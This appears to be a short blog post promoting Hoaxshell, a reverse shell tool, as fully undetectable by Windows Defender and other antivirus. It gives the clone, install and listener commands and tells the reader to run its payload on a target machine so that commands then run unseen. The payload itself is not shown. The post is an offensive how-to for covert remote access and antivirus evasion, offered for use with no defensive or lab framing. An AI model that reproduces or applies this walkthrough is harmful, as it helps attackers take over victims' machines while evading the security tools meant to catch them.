- Published on
Fully Undetectable Reverse Shells
221 words2 min read
- Authors
- Name
- Acid
- @whynotacid
Frustrated with AVs breaking your shells?
Not to worry anymore I got your back. I will show you how to create a reverse shell which is fully undetectable by Win Defender and other anti virus.
Hoaxshell 🚗
IntroducingHoaxshell is a reverse shell which as of writing this post is completely undetectable by Defender and other Anti Viruses.
Setup 📐
git clone https://github.com/t3l3machus/hoaxshell
cd hoaxshell
pip3 install -r requirements.txt
Usage 👊🏻
python3 hoaxshell.py -h
You need to start by providing an IP to listen on
Find your IP address
sudo ifconfig
Start the listener
python hoaxshell.py -s <Your IP here>
Run the giant monstrous payload on the target machine
You now have a shell 🔥🎊
And the best part? You can now run any command without being detected.
Running commands
Anti Virus Fool Proof
Both Defender and Quick Heal are fooled by the payload and do not detect it.
← Back to blogs